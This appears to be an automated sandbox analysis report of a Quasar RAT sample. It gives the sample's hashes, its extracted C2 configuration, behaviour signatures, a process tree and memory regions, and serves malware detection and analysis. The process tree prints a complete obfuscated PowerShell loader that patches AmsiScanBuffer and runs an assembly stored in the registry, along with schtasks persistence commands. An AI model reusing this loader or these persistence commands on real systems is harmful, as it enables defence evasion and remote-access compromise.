Analysis

  • max time kernel
    150s
  • max time network
    135s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    02-05-2024 21:00

General

  • Target

    R0X-Built.exe

  • Size

    409KB

  • MD5

    a0f5aa5764c4f66eee82f857f9f447b6

  • SHA1

    3c3a780d020cb3eb3088223443fe813abb95dccd

  • SHA256

    43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

  • SHA512

    458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

  • SSDEEP

    6144:RMX2pJAJcC0B61K6qZ1fQ57P/EwXhb4azmosb+lfXdOIFyoOOfTA3pwF:lpyJcC+uK6qZ1G8QJjbfNOSOObA3pwF

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes
  • encryption_key

    KaNwItdY6wlv5nCN4prL

  • install_name

    $srr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    1000

  • startup_key

    $srr-powershell

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 58 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:584
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1020
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{f0d76f0f-6c75-4b55-a39e-708fffb31f00}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1560
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:636
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
          1⤵
            PID:744
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
            1⤵
              PID:908
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
              1⤵
                PID:344
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                1⤵
                  PID:368
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                  1⤵
                    PID:560
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                    1⤵
                      PID:1100
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                        PID:1108
                        • c:\windows\system32\taskhostw.exe
                          taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                          2⤵
                            PID:3228
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CggYwphLnnkS{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hszNWIcoBXYduJ,[Parameter(Position=1)][Type]$gtjUPzTmqP)$lmppgptgkLy=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'mo'+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+'a'+'t'+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+','+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+'C'+'l'+[Char](97)+'ss'+','+''+[Char](65)+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+'as'+'s'+'',[MulticastDelegate]);$lmppgptgkLy.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+'e'+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+'ig'+[Char](44)+'Pub'+'l'+'ic',[Reflection.CallingConventions]::Standard,$hszNWIcoBXYduJ).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+[Char](44)+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$lmppgptgkLy.DefineMethod(''+'I'+''+'n'+'vo'+'k'+'e',''+'P'+'ub'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+','+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+'Vi'+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$gtjUPzTmqP,$hszNWIcoBXYduJ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+',M'+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $lmppgptgkLy.CreateType();}$kZPhRtIftUEcB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+'m'+''+'.'+''+'d'+''+[Char](108)+'l')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+'.W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+'U'+[Char](110)+''+'s'+''+'a'+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+'i'+'ve'+'M'+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$voqUcmTNnbpGRh=$kZPhRtIftUEcB.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+'cA'+'d'+''+'d'+''+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+'li'+[Char](99)+','+'S'+''+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$tstXwoyiZRVDksBpGbi=CggYwphLnnkS @([String])([IntPtr]);$BnYKoCfDorIEAmwsOvxJGr=CggYwphLnnkS @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SUEjfwBdTxd=$kZPhRtIftUEcB.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+'e'+'l'+'3'+[Char](50)+''+'.'+'d'+'l'+''+[Char](108)+'')));$MAqvgfGHiplXtQ=$voqUcmTNnbpGRh.Invoke($Null,@([Object]$SUEjfwBdTxd,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+'i'+'br'+[Char](97)+'ry'+[Char](65)+'')));$rINRjvQoVOJWwFbvV=$voqUcmTNnbpGRh.Invoke($Null,@([Object]$SUEjfwBdTxd,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+''+'r'+'o'+[Char](116)+'e'+[Char](99)+''+'t'+'')));$YDCmyri=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MAqvgfGHiplXtQ,$tstXwoyiZRVDksBpGbi).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+'.'+[Char](100)+''+'l'+''+[Char](108)+'');$XTAVkcmXMZYYAdXET=$voqUcmTNnbpGRh.Invoke($Null,@([Object]$YDCmyri,[Object]('A'+[Char](109)+''+[Char](115)+''+'i'+''+'S'+''+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$ncRfArtTrn=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rINRjvQoVOJWwFbvV,$BnYKoCfDorIEAmwsOvxJGr).Invoke($XTAVkcmXMZYYAdXET,[uint32]8,4,[ref]$ncRfArtTrn);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XTAVkcmXMZYYAdXET,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rINRjvQoVOJWwFbvV,$BnYKoCfDorIEAmwsOvxJGr).Invoke($XTAVkcmXMZYYAdXET,[uint32]8,0x20,[ref]$ncRfArtTrn);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+'T'+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+''+'7'+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:1796
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k localservice -s nsi
                          1⤵
                            PID:1200
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s Themes
                            1⤵
                              PID:1208
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                              1⤵
                                PID:1216
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k localservice -s EventSystem
                                1⤵
                                  PID:1224
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                                  1⤵
                                    PID:1376
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                    1⤵
                                      PID:1444
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                      1⤵
                                        PID:1456
                                        • c:\windows\system32\sihost.exe
                                          sihost.exe
                                          2⤵
                                            PID:2056
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                          1⤵
                                            PID:1532
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                            1⤵
                                              PID:1568
                                            • c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                              1⤵
                                                PID:1612
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                1⤵
                                                  PID:1660
                                                • c:\windows\system32\svchost.exe
                                                  c:\windows\system32\svchost.exe -k localservice -s netprofm
                                                  1⤵
                                                    PID:1728
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                    1⤵
                                                      PID:1760
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                      1⤵
                                                        PID:1776
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                        1⤵
                                                          PID:1856
                                                        • c:\windows\system32\svchost.exe
                                                          c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                          1⤵
                                                            PID:1872
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:2000
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                              1⤵
                                                                PID:1740
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                1⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1976
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                                1⤵
                                                                  PID:2296
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                  1⤵
                                                                    PID:2360
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                    1⤵
                                                                      PID:2400
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                      1⤵
                                                                        PID:2408
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2436
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                          1⤵
                                                                            PID:2472
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                            1⤵
                                                                              PID:2480
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                                              1⤵
                                                                                PID:2620
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                1⤵
                                                                                  PID:2900
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:2920
                                                                                  • c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                                    1⤵
                                                                                      PID:2892
                                                                                    • c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                                      1⤵
                                                                                        PID:3276
                                                                                      • C:\Windows\Explorer.EXE
                                                                                        C:\Windows\Explorer.EXE
                                                                                        1⤵
                                                                                          PID:3428
                                                                                          • C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"
                                                                                            2⤵
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:420
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f
                                                                                              3⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:192
                                                                                            • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4036
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                                4⤵
                                                                                                • Creates scheduled task(s)
                                                                                                PID:1052
                                                                                            • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:1848
                                                                                            • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                              "SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST
                                                                                              3⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:1948
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                            PID:4008
                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                            1⤵
                                                                                              PID:4136
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                              1⤵
                                                                                                PID:4928
                                                                                              • c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                                                                                                1⤵
                                                                                                  PID:4676
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                                  1⤵
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:4060
                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                  1⤵
                                                                                                  • Drops file in System32 directory
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:2520
                                                                                                • c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                  1⤵
                                                                                                    PID:2796
                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                    1⤵
                                                                                                      PID:2692
                                                                                                    • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                      C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:2252
                                                                                                      • C:\Windows\System32\InstallAgent.exe
                                                                                                        C:\Windows\System32\InstallAgent.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:1588
                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                          1⤵
                                                                                                            PID:4908
                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                            1⤵
                                                                                                              PID:3332
                                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                              1⤵
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:2820

                                                                                                            Network

                                                                                                            MITRE ATT&CK Matrix ATT&CK v13

                                                                                                            Execution

                                                                                                            Scheduled Task/Job

                                                                                                            1
                                                                                                            T1053

                                                                                                            Persistence

                                                                                                            Scheduled Task/Job

                                                                                                            1
                                                                                                            T1053

                                                                                                            Privilege Escalation

                                                                                                            Scheduled Task/Job

                                                                                                            1
                                                                                                            T1053

                                                                                                            Discovery

                                                                                                            Query Registry

                                                                                                            1
                                                                                                            T1012

                                                                                                            System Information Discovery

                                                                                                            1
                                                                                                            T1082

                                                                                                            Command and Control

                                                                                                            Web Service

                                                                                                            1
                                                                                                            T1102

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                              Filesize

                                                                                                              162KB

                                                                                                              MD5

                                                                                                              152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                              SHA1

                                                                                                              c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                              SHA256

                                                                                                              a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                              SHA512

                                                                                                              2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                            • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                                              Filesize

                                                                                                              409KB

                                                                                                              MD5

                                                                                                              a0f5aa5764c4f66eee82f857f9f447b6

                                                                                                              SHA1

                                                                                                              3c3a780d020cb3eb3088223443fe813abb95dccd

                                                                                                              SHA256

                                                                                                              43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

                                                                                                              SHA512

                                                                                                              458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

                                                                                                            • C:\Windows\Temp\__PSScriptPolicyTest_i1p3w0xa.q2n.ps1
                                                                                                              Filesize

                                                                                                              1B

                                                                                                              MD5

                                                                                                              c4ca4238a0b923820dcc509a6f75849b

                                                                                                              SHA1

                                                                                                              356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                              SHA256

                                                                                                              6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                              SHA512

                                                                                                              4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                            • memory/420-4-0x0000000073CA0000-0x000000007438E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/420-20-0x0000000073CA0000-0x000000007438E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/420-5-0x0000000005270000-0x00000000052D6000-memory.dmp
                                                                                                              Filesize

                                                                                                              408KB

                                                                                                            • memory/420-6-0x0000000005D90000-0x0000000005DA2000-memory.dmp
                                                                                                              Filesize

                                                                                                              72KB

                                                                                                            • memory/420-7-0x0000000006180000-0x00000000061BE000-memory.dmp
                                                                                                              Filesize

                                                                                                              248KB

                                                                                                            • memory/420-3-0x00000000051D0000-0x0000000005262000-memory.dmp
                                                                                                              Filesize

                                                                                                              584KB

                                                                                                            • memory/420-0-0x0000000073CAE000-0x0000000073CAF000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/420-1-0x0000000000840000-0x00000000008AC000-memory.dmp
                                                                                                              Filesize

                                                                                                              432KB

                                                                                                            • memory/420-2-0x0000000005630000-0x0000000005B2E000-memory.dmp
                                                                                                              Filesize

                                                                                                              5.0MB

                                                                                                            • memory/584-72-0x000001A0AF070000-0x000001A0AF09B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/584-73-0x00007FFA9B310000-0x00007FFA9B320000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/584-66-0x000001A0AF070000-0x000001A0AF09B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/584-64-0x000001A0AF040000-0x000001A0AF065000-memory.dmp
                                                                                                              Filesize

                                                                                                              148KB

                                                                                                            • memory/584-65-0x000001A0AF070000-0x000001A0AF09B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/636-77-0x0000024E1C3B0000-0x0000024E1C3DB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/636-84-0x00007FFA9B310000-0x00007FFA9B320000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/636-83-0x0000024E1C3B0000-0x0000024E1C3DB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/744-94-0x0000017C5CD90000-0x0000017C5CDBB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/744-95-0x00007FFA9B310000-0x00007FFA9B320000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/744-88-0x0000017C5CD90000-0x0000017C5CDBB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/908-106-0x00007FFA9B310000-0x00007FFA9B320000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/908-105-0x0000017F96130000-0x0000017F9615B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/908-99-0x0000017F96130000-0x0000017F9615B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/1020-110-0x000001312D310000-0x000001312D33B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/1560-50-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/1560-55-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/1560-53-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/1560-52-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/1560-51-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/1560-57-0x00007FFADA9B0000-0x00007FFADAA5E000-memory.dmp
                                                                                                              Filesize

                                                                                                              696KB

                                                                                                            • memory/1560-56-0x00007FFADB280000-0x00007FFADB45B000-memory.dmp
                                                                                                              Filesize

                                                                                                              1.9MB

                                                                                                            • memory/1560-61-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/1796-49-0x00007FFADA9B0000-0x00007FFADAA5E000-memory.dmp
                                                                                                              Filesize

                                                                                                              696KB

                                                                                                            • memory/1796-25-0x000001DDFD910000-0x000001DDFD932000-memory.dmp
                                                                                                              Filesize

                                                                                                              136KB

                                                                                                            • memory/1796-28-0x000001DDFDAC0000-0x000001DDFDB36000-memory.dmp
                                                                                                              Filesize

                                                                                                              472KB

                                                                                                            • memory/1796-47-0x000001DDFDA80000-0x000001DDFDAAA000-memory.dmp
                                                                                                              Filesize

                                                                                                              168KB

                                                                                                            • memory/1796-48-0x00007FFADB280000-0x00007FFADB45B000-memory.dmp
                                                                                                              Filesize

                                                                                                              1.9MB

                                                                                                            • memory/4036-13-0x0000000073CA0000-0x000000007438E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/4036-14-0x0000000073CA0000-0x000000007438E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/4036-44-0x0000000006EA0000-0x0000000006EAA000-memory.dmp
                                                                                                              Filesize

                                                                                                              40KB

                                                                                                            • memory/4036-682-0x0000000073CA0000-0x000000007438E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/4036-683-0x0000000073CA0000-0x000000007438E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB